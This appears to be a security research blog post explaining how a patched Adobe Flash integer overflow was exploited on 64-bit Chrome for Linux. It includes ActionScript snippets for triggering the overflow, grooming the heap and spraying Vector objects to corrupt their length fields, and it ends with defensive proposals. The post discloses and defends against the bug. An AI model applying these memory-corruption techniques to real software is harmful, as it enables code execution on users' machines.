Posted by Chris Evans, Kidnapper of RIP
A couple of weeks ago, Adobe released security bulletin APSB14-21, including 8 fixes for bugs reported by Project Zero. Full details of these bugs are now public in our bug tracker. Some of the more interesting ones include a double free in the RTMP protocol and an integer overflow when concatenating strings. Again, we’d like to thank Adobe for a response time well ahead of our standard 90-day disclosure deadline.
Prelude
Before we get started, though, it’s worth briefly noting why there is so much value in writing an exploit. Finding and eliminating bugs obviously improves software correctness, but writing exploits is always a significant learning opportunity. Throughout the history of the security industry, there’s a long track record of offense driving defense, leading to technologies such as stack canaries, NX support in processors and ASLR.
Project Zero is not just a bug hunting initiative. We’re doing our part to continue the tradition of practical and public research of exploitation techniques -- and deriving defenses from them. For example, our glibc defensive patch was accepted as a follow-on from our glibc exploit.
The case of this particular exploit starts with some irony: my overly hasty initial triage of the bug was based on instincts that a more in-depth analysis of exploitation opportunities later proved wrong. In the bug history, you can see the claim “almost certainly 64-bit only” (wrong!) and then “does not work in Chrome 64-bit Linux”. We learned not to declare anything unexploitable in our previous post about exploiting a subtle condition in glibc. Therefore, I had to declare shenanigans on myself and tackle the challenge: exploit this bug on Chrome 64-bit Linux.
The bug
The bug is triggered by calling BitmapData.copyPixelsToByteArray() with a reference to a ByteArray that has its position property set very large -- close to 2^32. This results in an integer overflow in 32-bit arithmetic. The overflow occurs even on 64-bit because the relevant position and length variables are (quite reasonably) stored in 32-bit variables. The code then believes that it can copy the pixels, starting to write them at position, and stay within the bounds of the buffer. Instead, a buffer overflow occurs. On 32-bit, the out-of-bounds write lands before the start of the buffer because the pointer wraps. On 64-bit, things are not as kind to the attacker. On a typical 64-bit Linux process setup with a 1MB buffer, the situation will look like this:
… | buffer: 1MB | heap, libs, binary | !!
The out-of-bounds write (marked !! in the diagrams) is at approximately buffer + 4GB. This will not wrap around the massive 64-bit address space, leading to a write way off in unmapped space. Insta-crash. The most obvious way to avoid the crash is to make the buffer massive, almost 4GB, leading to this situation:
… | buffer: 4GB | !! heap, libs, binary |
This is readily exploitable. However, 64-bit Chrome on Linux has a defensive measure where the amount of mapped address space is limited to 4GB. So the large buffer allocation will fail and prevent that particular attack.
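To make the shape of the trigger concrete, here is a minimal ActionScript sketch of the pattern just described. The specific position value, buffer size and bitmap dimensions are illustrative assumptions rather than the exact proof-of-concept values; the essential ingredients are a ByteArray whose position is close to 2^32 and a copyPixelsToByteArray() call whose 32-bit offset arithmetic then wraps.

import flash.display.BitmapData;
import flash.utils.ByteArray;

var ba:ByteArray = new ByteArray();
ba.length = 1024 * 1024;           // 1MB backing buffer
ba.position = 0xfffff000;          // close to 2^32; 32-bit offset math will wrap
// A small, default-filled bitmap: white pixels with a full alpha channel (0xffffffff).
var bmp:BitmapData = new BitmapData(64, 64, true, 0xffffffff);
// The bounds check is performed on the wrapped 32-bit result and passes; the
// copy then writes pixel data roughly 4GB beyond the start of the 1MB buffer.
bmp.copyPixelsToByteArray(bmp.rect, ba);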
The heap groom
We’re going to need a trick to exploit this without slamming into the 4GB address space limit. The breakthrough -- which did not occur to me before attempting to develop an exploit -- comes when we realize that we don’t need to have the address space contiguously mapped. The out-of-bounds write will happily still go ahead even if it “jumps over” a hole in the address space. By having a hole in the address space, perhaps we can usefully trigger the corruption with less than 4GB mapped.
But how do we put this hole where we want it? Looking at how the Flash allocator works with the strace system tool, we see that very large allocations are serviced by unhinted mmap(). The standard Linux algorithm for servicing unhinted mmap() calls is to stack them adjacently, downwards in address space, unless an existing hole can satisfy the request. So let’s see what happens when we allocate two 1GB chunks:
… | buffer2: 1GB | buffer1: 1GB | heap, libs, binary |
And then we free the first one (a direct munmap() call is seen):
… | buffer2: 1GB | 1GB hole | heap, libs, binary |
And then allocate a 2GB buffer (too big to fit in the hole):
… | buffer3: 2GB | buffer2: 1GB | 1GB hole | !! heap, libs, binary |
Aha! We’ve managed to engineer a situation where we’ve never had more than 4GB of address space mapped at any given moment, and at the end, a corruption at buffer3 + 4GB will land right in a writable region: the heap.
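Sketched in ActionScript, the groom looks roughly like the following. This is a sketch under assumptions: the sizes are nominal, ByteArray stands in for whatever large allocation is most convenient, very large ByteArray backing stores are assumed to be serviced by unhinted mmap() (as observed with strace above), and clear() is assumed to release the backing store with a direct munmap().

import flash.utils.ByteArray;

const GB:uint = 1024 * 1024 * 1024;

// A large ByteArray whose backing store comes from an unhinted mmap().
function allocate(sizeBytes:uint):ByteArray {
    var b:ByteArray = new ByteArray();
    b.length = sizeBytes;
    return b;
}

var buffer1:ByteArray = allocate(1 * GB);   // lands just below heap, libs, binary
var buffer2:ByteArray = allocate(1 * GB);   // stacked below buffer1
buffer1.clear();                            // munmap() of buffer1: a 1GB hole remains
var buffer3:ByteArray = allocate(2 * GB);   // too big for the hole, so mapped below buffer2
// Never more than 4GB is mapped at any one time, yet buffer3 + 4GB now points
// across the 1GB hole and into writable memory.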
The corruption target
Now that we have a reasonably controlled memory corruption situation, we need to pick something to corrupt. As is pretty standard in modern heap buffer overflow exploitation in a scripting environment, we’re going to try to clobber the length of an array-like object. If we clobber any such length to be larger, we will then be able to read and write arbitrary relative heap memory. Once we’ve achieved such a powerful primitive, it’s essentially game over. Successful exploitation is pretty much assured: defeat ASLR by reading the value of a vtable, and then write a new vtable that redirects execution to a sequence of opcodes of our choosing.
We decide to corrupt a Vector.<uint> buffer object. This is a fairly standard, documented technique. I recommend Haifei Li’s excellent paper as background reading. This buffer object is an obvious corruption target because of three properties it possesses:
- The attacker can choose arbitrary sizes for these objects, meaning there is a lot of control over where in the heap they are placed relative to the pending heap corruption.
- The object starts with a length field, and corrupting it results in arbitrary heap relative read/write being exposed to script.
- The object is resilient to corruption in general. Aside from the length field, there is just a single pointer and trashing this pointer does not affect the ability to use the Vector, or otherwise cause noticeable stability issues during the course of exploitation. (We could even restore its value post-exploitation if we wished.)
To proceed, we simply create many (32) Vector.<uint> objects, all with buffers sized at about 2MB. These typically end up being stacked downwards at the top of the 1GB hole. In reality, the 1GB and 2GB allocations end up being a little larger than expected under the covers. This means that the corruption address of buffer3 + 4GB actually ends up corrupting objects within the 1GB hole instead of after it. This is ideal because we can make sure that only our large buffers are corrupted. In terms of the actual data to write, we just use the default values in an empty BitmapData, which are 0xffffffff (white pixels with a full alpha channel). 0xffffffff is a plenty large enough length to proceed with the exploit!
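For completeness, here is a sketch of the spray and of detecting the corrupted Vector afterwards. The counts and sizes follow the description above; the comment marks where the copyPixelsToByteArray() corruption is triggered, and the detection loop relies on the fact that a stomped length of 0xffffffff reads back from script as far larger than the original element count.

const NUM_VECTORS:int = 32;
const ELEMENTS:uint = (2 * 1024 * 1024) / 4;   // ~2MB of 4-byte uints per buffer

var sprayed:Vector.<Vector.<uint>> = new Vector.<Vector.<uint>>();
for (var i:int = 0; i < NUM_VECTORS; i++) {
    sprayed.push(new Vector.<uint>(ELEMENTS));
}

// ... trigger the copyPixelsToByteArray() overflow here ...

// Any Vector whose length now exceeds ELEMENTS had its length field stomped
// with 0xffffffff; indexing it past ELEMENTS gives relative heap reads and
// writes directly from script.
var corrupted:Vector.<uint> = null;
for (i = 0; i < NUM_VECTORS; i++) {
    if (sprayed[i].length > ELEMENTS) {
        corrupted = sprayed[i];
        break;
    }
}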
Proceeding onwards
There is nothing particularly exciting or unique about how the exploit proceeds to demonstrate code execution, so we’ll skip the lengthy explanation here. I’ve made an attempt to fully comment the exploit source code, so if you want to continue to follow along I recommend you read the materials attached to the public bug.
The only part I’d flag as mildly interesting -- because it differs from the previously quoted paper -- is how we get known data at a known heap address. We do it with a Vector.<uint> object again. Each of these is in fact a pair of objects: a script object, which is fixed-size and contains metadata; and a buffer object, which contains the arbitrary data prefixed by the length. The script object forms a distinct pattern in memory and also contains a pointer to the buffer object. By locating any Vector.<uint> script object, we can then use a raw memory edit to change a property of the object. This property change is visible to ActionScript, so we then know which handle corresponds to a buffer at which raw address.
Conclusions, and turning what we’ve learned into generic defenses
Various technologies would have changed the exploitation landscape here, and can now be investigated in more detail:
- Randomized placement of large memory chunks. Non-deterministic placement of large allocations would have broken the heap grooming aspect of the exploit.
- Isolation of Vector.<uint> buffers. As we’ve seen, corruption of these buffers is an extremely dangerous condition. Some of the most recent advances in memory corruption defenses have been “isolated” or “partitioned” heaps. These technologies seem applicable here. (They would need to be applied not just to the Vector buffers, but to the general case: partitioning off read/write objects where the attacker controls both the size and the content.)
Given the open-source nature of the ActionScript engine, and the open-source nature of some potentially helpful technologies, a prototype of a generic defense is now on the Project Zero TODO list!